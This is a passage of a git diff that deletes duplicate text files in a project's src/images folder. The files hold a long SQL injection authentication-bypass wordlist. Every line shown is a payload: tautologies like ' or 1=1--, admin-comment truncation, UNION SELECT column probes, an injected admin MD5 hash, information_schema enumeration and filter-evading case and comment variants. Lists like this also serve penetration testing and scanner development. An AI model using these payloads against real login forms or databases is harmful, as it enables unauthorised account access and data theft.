-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-long (1) (1) (1).txt b/src/images/sqli-authbypass-long (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-long (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-long (1) (1).txt b/src/images/sqli-authbypass-long (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-long (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
